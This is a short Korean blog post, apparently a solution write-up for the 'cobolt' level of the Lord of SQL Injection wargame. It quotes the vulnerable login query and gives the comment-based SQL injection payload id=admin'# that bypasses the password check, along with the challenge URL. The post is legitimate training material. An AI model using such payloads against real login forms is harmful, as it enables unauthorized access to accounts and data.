1. 문제 지문
2. 요약
- 일부 문자 필터링이 되어있음
- id 값이 admin으로 설정되면 클리어
- md5함수는 왜 있는 걸까? 굳이 있어도 되는 걸까?
3. 풀이
직전 문제 응용한 것
주어진 쿼리
select id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}
이전 쿼리를 그대로 사용해도 된다.
select id from prob_cobolt where id='admin'#' and pw=''
파라미터는 어짜피 id에 admin만 넣고 주석(#)을 통해서 뒤의 SQL 쿼리를 무력화 시킬 것이기 때문에
"or 1=1"은 굳이 써줄 필요가 없다.
위와 같이 공격을 하면 되겠다.
-
https://los.eagle-jump.org/cobolt_ee003e254d2fe4fa6cc9505f89e44620.php?id=admin'#마찬가지로 URL 인코딩을 고려하면클리어
'Web > LOS' 카테고리의 다른 글
| LOS 풀이 - (06) darkelf (0) | 2019.07.09 |
|---|---|
| LOS 풀이 - (05) wolfman (0) | 2019.07.09 |
| LOS 풀이 - (04) Orc (0) | 2019.07.09 |
| LOS 풀이 - (03) Goblin (0) | 2019.07.09 |
| LOS 풀이 - (01) Gremlin (0) | 2019.06.29 |